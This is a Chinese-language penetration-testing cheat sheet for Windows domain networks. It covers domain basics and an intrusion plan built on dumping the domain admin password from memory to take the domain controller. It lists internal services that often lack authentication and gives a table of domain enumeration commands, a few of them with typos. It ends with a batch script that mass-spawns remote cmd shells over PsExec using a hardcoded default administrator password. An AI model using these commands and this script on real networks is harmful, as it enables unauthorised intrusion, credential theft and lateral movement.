域
将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域。他是组织与存储资源的核心管理单元,在域中,至少有一台域控制器,域控制器中保存着整个域的用户账号和安全数据库。
工作组和域的区域
工作组互不管理,域有域管。
域的优点:
- 权限管理比较集中,管理成本降低
- 保密性加强
- 安全性加强
- 提高了便捷性
域的特性
- 默认情况下,域用户可以登录到域中所有的工作站,不包括域控制器,管理员也可以指定具体计算机,域用户信息保存在活动目录中。
- 域成员计算机在登录的时候可以选择登录到时域中的时候,身份验证是采用kerberos协议在域控制器上进行,登录到此计算机则是通过SAM来进行NTLM验证的。
域渗透思路
通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。
内网特殊端口
21 ftp 主要看是否支持匿名,也可以跑弱口令
80 web 常见web漏洞以及是否为一些管理后台
443 openssl 心脏滴血以及一些web漏洞测试
873 rsync 主要看是否支持匿名,也可以跑弱口令
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI未授权访问易导致内网
被直接篡改或者作为代理进入内网
6379 redis 一般无认证,可直接访问
8000-9090 都是一些常见的web端口,有些运维喜欢把管理后 台开在这些非80的端口上
9200 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch 命令执行漏洞
11211 memcache 未授权访问
27017 mongodb 未授权访问
28017 mongodb 统计页面
域渗透常用指令
| 指令 | 说明 |
|---|---|
| dsquery server | 得到控制器 |
| ipconfig /all | 查询本机ip段,所在域等 |
| ip net localgroup administrators | 本机管理员[通常含有域用户] |
| net group “domain controllers” /domain | 域控制器主机名 |
| net group “domain admins” /domain | 查询域管理用户 |
| net user /domain | 查询域用户 |
| net time /domin | 判断主域,主域服务器都做时间服务器 |
| net config workstation | 查询当前登录的域 |
| net accounts /domain | 查询域密码策略 |
| net accounts | 查看本地密码策略 |
| tasklist /V | 查看进程 |
| wmic startup | 查看启动项 |
| wmic qfe | 补丁信息 |
| wmic os | 操作系统类型 |
批量反弹cmdshell
@echo off
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F “eol=#” %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p “123456″ cmd & start cmd /c PsExec.exe \\%%i -u administrator -p “123456″ cmd
:end
exit